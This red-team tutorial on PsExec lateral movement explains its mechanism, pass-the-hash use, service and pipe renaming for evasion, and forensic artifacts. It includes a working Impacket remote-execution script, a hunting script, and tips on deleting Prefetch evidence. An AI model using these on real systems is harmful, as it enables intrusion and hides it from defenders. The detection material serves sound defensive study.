As a red teamer, reliable Remote Code Execution (RCE) on a host you already hold credentials for is one of the primary goals of lateral movement. There are many ways to execute code on a remote Windows machine (WMI, WinRM, DCOM), but one tool has stood the test of time: PsExec.
Originally developed by Mark Russinovich for Sysinternals (now owned by Microsoft), PsExec is a legitimate administration tool. It is not malware. However, its capability to gain an interactive SYSTEM shell on a remote machine makes it a favorite for attackers and a nightmare for defenders.
In this guide, we will dissect PsExec. We won’t just run it; we will understand its anatomy, its noise, and the modern alternatives that might save your operation from getting burned.
1. Anatomy of an Execution: How PsExec Works
Understanding the mechanism is critical for understanding the detection. When you run psexec \\target cmd.exe, the following sequence occurs:
- Authentication: PsExec connects to the target over SMB (TCP 445) and authenticates to the IPC$ (inter-process communication) share.
- Upload: it copies the service executable (PSEXESVC.exe by default) to the ADMIN$ share, which maps to C:\Windows.
- Service Creation: it talks to the Service Control Manager (SCM) over the \pipe\svcctl RPC endpoint on IPC$ to create and start a service named PSEXESVC.
- Named Pipe: the service creates a named pipe (\pipe\PSEXESVC, plus per-session stdin/stdout/stderr pipes) for input/output redirection.
- Execution: the service spawns your command (cmd.exe) as a child process, so on the target cmd.exe has PSEXESVC.exe as its parent.
- Cleanup: on exit it stops and deletes the service and (usually) deletes the binary.
The Fatal Flaw: Steps 2 and 3 (the upload and the service creation) are the loud part. A new file in C:\Windows and a new service each leave their own log entries, and deleting them afterwards does not remove the entries.
2. Advanced Offensive Usage
While the original tool is powerful, Red Teamers primarily use the Impacket implementation (psexec.py) because it accepts NTLM hashes (pass-the-hash) and Kerberos tickets natively, and runs from a Linux attack box without touching the Sysinternals binary.
Impacket psexec.py and Pass-the-Hash
You don't need the password if you have the NT hash: psexec.py takes -hashes LMHASH:NTHASH, and the LM half can be left empty.
Running as SYSTEM (-s)
By default, the official PsExec runs the command as the user you authenticated as; the -s flag runs it as NT AUTHORITY\SYSTEM instead. Impacket's psexec.py is always SYSTEM, because the payload is executed by the service it creates.
The Interactive GUI Session (-i)
If you want your payload to be visible on the user's desktop (e.g., to pop a message box or run a GUI tool), you must use the -i flag with the session ID of the logged-on user (query session on the target lists them; session 0 is the non-interactive services session, so interactive users are usually 1 or 2).
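The sequence from section 1, with the pass-the-hash login from this section, reduced to its SMB and SCMR primitives. This is an added example written against the real Impacket library; it is not code from the original post or from Impacket's own psexec.py. It performs the authenticate, upload, create/start service and clean-up steps; the named pipe and the child process are the job of whatever service binary you upload (Sysinternals' PSEXESVC.exe or Impacket's RemComSvc), so the function takes that binary as a local path. Target, credentials and binary name are placeholders; running it live needs impacket installed and a reachable host.

```python
"""Added example: the PsExec upload/create/start/delete cycle with Impacket."""
import random
import string


def random_service_name(length=4):
    """Impacket-style default: a random run of ASCII letters (e.g. 'hRzB')."""
    return "".join(random.choice(string.ascii_letters) for _ in range(length))


def plan(service_name, binary_name):
    """Pure helper: the names a defender will later find for this execution.

    ADMIN$ maps to %SystemRoot% (normally C:\\Windows), so the service's
    BinaryPathName is written relative to that variable, which is exactly
    what a System 7045 event will record.
    """
    return {
        "share": "ADMIN$",
        "remote_file": binary_name,
        "binpath": "%SystemRoot%\\" + binary_name,
        "service": service_name,
    }


def psexec_like(target, domain, user, password="", nthash="",
                local_binary=None, service_name=None, binary_name=None):
    """Upload -> create service -> start -> delete. Pass nthash instead of
    password to pass-the-hash (Impacket accepts an empty LM half)."""
    from impacket.smbconnection import SMBConnection   # imported lazily: only needed live
    from impacket.dcerpc.v5 import transport, scmr

    service_name = service_name or random_service_name()
    binary_name = binary_name or service_name + ".exe"
    p = plan(service_name, binary_name)

    # Step 1: SMB session. The logon is what produces Security 4624 (type 3) on the target.
    conn = SMBConnection(target, target)
    conn.login(user, password, domain, lmhash="", nthash=nthash)

    # Step 2: write the service binary into C:\Windows through ADMIN$ (new MFT/USN entries).
    with open(local_binary, "rb") as fh:
        conn.putFile(p["share"], p["remote_file"], fh.read)

    # Step 3: bind to the SCM over the svcctl named pipe on IPC$ and create the service (7045).
    rpc = transport.SMBTransport(target, filename=r"\svcctl", smb_connection=conn)
    dce = rpc.get_dce_rpc()
    dce.connect()
    dce.bind(scmr.MSRPC_UUID_SCMR)
    sc_handle = scmr.hROpenSCManagerW(dce)["lpScHandle"]
    svc_handle = scmr.hRCreateServiceW(
        dce, sc_handle, service_name + "\x00", service_name + "\x00",
        lpBinaryPathName=p["binpath"] + "\x00", dwStartType=scmr.SERVICE_DEMAND_START,
    )["lpServiceHandle"]
    try:
        scmr.hRStartServiceW(dce, svc_handle)   # 7036: service entered the running state
    except Exception as exc:
        # A plain EXE never reports back to the SCM, so the start call fails with
        # ERROR_SERVICE_REQUEST_TIMEOUT even though the binary did run.
        print("start returned:", exc)

    # Step 6: tear down. Each call is still logged; deleting the service does not erase 7045.
    try:
        scmr.hRControlService(dce, svc_handle, scmr.SERVICE_CONTROL_STOP)
    except Exception:
        pass
    scmr.hRDeleteService(dce, svc_handle)
    scmr.hRCloseServiceHandle(dce, svc_handle)
    scmr.hRCloseServiceHandle(dce, sc_handle)
    conn.deleteFile(p["share"], p["remote_file"])
    conn.logoff()
    return p


if __name__ == "__main__":
    # Placeholder target and hash (assumptions, not values from the post).
    print(psexec_like("10.0.0.5", "CORP", "admin", nthash="31d6cfe0d16ae931b73c59d7e0c089c0",
                      local_binary="./RemComSvc.exe"))
```

Every artifact in section 4 maps onto one call above, which is the point of reading it this way: the login, the putFile and the hRCreateServiceW are each a separate log line, and nothing in the clean-up phase removes any of them.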
3. Defense Evasion: Reducing the Noise
If you must use PsExec, do not use the defaults.
1. Rename the Service (-r)
The default service name PSEXESVC is flagged by almost every IDS/EDR in existence.
Sysinternals PsExec: the -r option sets the name of the remote service it creates, so the service is no longer called PSEXESVC.
Impacket PsExec:
Currently, Impacket's psexec.py picks a random four-letter name for both the service and the uploaded binary by default (e.g., BvJk and BvJk.exe). While this avoids the static PSEXESVC string, a random four-letter executable appearing in the root of C:\Windows and registering as a service is still a high-confidence indicator of compromise.
Pro-Tip: upstream psexec.py already exposes -service-name and -remote-binary-name, so there is no need to patch the source to use a legitimate-sounding name like AdobeUpdateService. Remember that the binary still lands in C:\Windows and the 7045 event still records its path.
2. File-less Alternatives (smbexec.py & wmiexec.py)
If you want the “feel” of PsExec without the binary drop, use Impacket’s smbexec.py or wmiexec.py.
- smbexec.py: instead of uploading a binary, it creates a service whose binary path is a cmd.exe one-liner that echoes the command into a batch file, runs it with output redirected to a file on a loopback share (\\127.0.0.1\C$\__output by default), reads that file back over SMB and deletes it. No EXE is dropped, but a service is created and removed for every single command, so a session leaves a burst of 7045 events, and the command line itself is recorded in each one.
- wmiexec.py: uses DCOM to call Win32_Process.Create on the target. Generally the stealthiest of the three because it creates no service at all, but it is not artifact-free: the spawned cmd.exe has WmiPrvSE.exe as its parent and, unless you pass -nooutput, its output is redirected to a file on a share (\\127.0.0.1\ADMIN$\__<timestamp> by default) that is read back over SMB.
3. Named Pipe Evasion
Modern EDRs and Sysmon (Event ID 17, Pipe Created, and 18, Pipe Connected) watch named pipe creation, so the pipe name is an indicator on its own: \pipe\PSEXESVC for the Sysinternals tool and \pipe\RemCom_communicaton (sic) for Impacket's RemComSvc. Heavily modified Impacket builds rename the pipe to something that blends in with legitimate RPC endpoints, such as \pipe\atsvc (Task Scheduler) or \pipe\spoolss (Print Spooler). SharpNoPSExec sidesteps the problem rather than hiding it: instead of creating a service and a pipe, it temporarily repoints the binary path of an existing stopped service at your payload and restores it afterwards, so there is no new service, no dropped file and no PsExec pipe.
4. Forensic Artifacts: The Trail of Breadcrumbs
If you use PsExec, the blue team will find you if they look. On the target:
- System log, Event ID 7045: "A service was installed in the system", with the service name and ImagePath (%SystemRoot%\PSEXESVC.exe, or the cmd.exe one-liner for smbexec.py). Event ID 7036 records the service entering the running and stopped states. Deleting the service afterwards removes neither.
- Security log: Event ID 4624 with Logon Type 3 (network) for the authentication and, where file-share auditing is enabled, 5140/5145 for access to ADMIN$ and IPC$.
- File System: PSEXESVC.exe in C:\Windows. Even if deleted, it leaves an NTFS $MFT entry and USN journal records.
- Prefetch: PSEXESVC.EXE gets a Prefetch file when it executes (on workstations, where Prefetch is on by default).
- Shimcache (AppCompatCache) and Amcache: Windows records the binary in both.
- Process tree: the command runs as a child of PSEXESVC.exe (Sysmon Event ID 1 shows the parent), which almost no legitimate process has as a parent.
- Named Pipes: Sysmon Event ID 17 on the target, and SMB traffic on the wire, show \pipe\PSEXESVC (or your custom name) being created and opened.
- EULA Key: HKCU\Software\Sysinternals\PsExec\EulaAccepted. This is written on the machine PsExec was launched from, not on the target, so it identifies the operator's jump host when that host is examined.
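The artifacts above, and the smbexec.py/wmiexec.py patterns from section 3, turned into hunting logic over event data. This is an added example, not part of the original post: the event records are constructed dicts standing in for the fields of System 7045, Sysmon 1 (Process Create) and Sysmon 17 (Pipe Created), and the service, pipe and path values in them are either the documented tool defaults or invented stand-ins for a renamed service.

```python
"""Added example: hunt for the PsExec family in (constructed) Windows event records."""
import re
from dataclasses import dataclass

# Tool defaults that only change if the operator changes them.
KNOWN_SERVICE_NAMES = {"psexesvc", "btobto"}           # Sysinternals PsExec, Impacket smbexec.py
KNOWN_PIPES = {r"\psexesvc", r"\remcom_communicaton"}  # PSEXESVC; Impacket's RemComSvc (sic)
# Impacket psexec.py default: four random letters, dropped straight into %SystemRoot%.
RANDOM_EXE = re.compile(r"^(%systemroot%|c:\\windows)\\[a-z]{4}\.exe$", re.I)
# Any new service whose binary sits in the root of C:\Windows rather than a subfolder.
WINDOWS_ROOT_EXE = re.compile(r"^(%systemroot%|c:\\windows)\\[^\\]+\.exe$", re.I)
# smbexec.py: the "binary" is a cmd.exe one-liner echoing a command into a batch file
# and redirecting its output to a loopback share.
CMD_AS_BINPATH = re.compile(r"(%comspec%|cmd\.exe).*\becho\b.*(\\\\127\.0\.0\.1\\|__output)", re.I)
# wmiexec.py: output redirected to \\127.0.0.1\<share>\__<timestamp>.
LOOPBACK_REDIRECT = re.compile(r">\s*\\\\127\.0\.0\.1\\[^\\]+\\__", re.I)


@dataclass
class Finding:
    event_index: int
    rule: str
    confidence: str


def check_service_install(ev):
    """System 7045: service name and ImagePath as logged."""
    name = ev.get("ServiceName", "").lower()
    path = ev.get("ImagePath", "")
    if name in KNOWN_SERVICE_NAMES:
        return "default_psexec_service_name", "high"
    if RANDOM_EXE.match(path):
        return "random_4char_binary_in_windows_root", "high"
    if CMD_AS_BINPATH.search(path):
        return "command_line_as_service_binpath", "high"
    if WINDOWS_ROOT_EXE.match(path):   # renamed service, same tell-tale location
        return "new_service_binary_in_windows_root", "medium"
    return None


def check_process(ev):
    """Sysmon 1: parent/child relationship and command line."""
    parent = ev.get("ParentImage", "").lower()
    if parent.endswith("\\psexesvc.exe"):
        return "child_of_psexesvc", "high"
    if parent.endswith("\\wbem\\wmiprvse.exe") and LOOPBACK_REDIRECT.search(ev.get("CommandLine", "")):
        return "wmiprvse_child_with_loopback_output_file", "high"
    return None


def check_pipe(ev):
    """Sysmon 17: the control pipe plus the per-session PSEXESVC-<host>-<pid>-std* pipes."""
    pipe = ev.get("PipeName", "").lower()
    if pipe in KNOWN_PIPES or pipe.startswith(r"\psexesvc-"):
        return "known_psexec_pipe_name", "high"
    return None


CHECKS = {7045: check_service_install, 1: check_process, 17: check_pipe}


def hunt(events):
    findings = []
    for i, ev in enumerate(events):
        check = CHECKS.get(ev["id"])
        hit = check(ev) if check else None
        if hit:
            findings.append(Finding(i, *hit))
    return findings


# Constructed sample events (not real telemetry).
EVENTS = [
    {"id": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": 7045, "ServiceName": "hRzB", "ImagePath": r"%systemroot%\hRzB.exe"},
    {"id": 7045, "ServiceName": "WinSvcHost",   # smbexec.py with a renamed service
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"id": 7045, "ServiceName": "AdobeUpdateService", "ImagePath": r"%systemroot%\AdobeUpdateService.exe"},
    {"id": 7045, "ServiceName": "Sense", "ImagePath": r"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"},
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"},
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
    {"id": 17, "PipeName": r"\PSEXESVC"},
    {"id": 17, "PipeName": r"\RemCom_communicaton"},
    {"id": 17, "PipeName": r"\lsass"},
]

if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"event[{f.event_index}] {f.rule} ({f.confidence})")
```

The renamed AdobeUpdateService entry is the one to notice: it dodges every string match and still gets flagged, only at lower confidence, because a fresh service binary in the root of C:\Windows is itself the anomaly. Renaming buys you a lower severity, not invisibility.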
Conclusion
PsExec is a powerful administrative tool that enables reliable, interactive remote command execution. However, its high visibility mechanism (binary upload + service creation) makes it a “Door Kicker” tool rather than a “Ninja” tool.
Use it when you need stability and privilege (SYSTEM). Avoid it when you need stealth.
Detailed knowledge of its artifacts lets you clean up (delete the Prefetch file; clearing the event log is riskier, since clearing the Security log writes Event ID 1102 and clearing the System log writes Event ID 104) or choose a better tool for the job.
Happy hacking!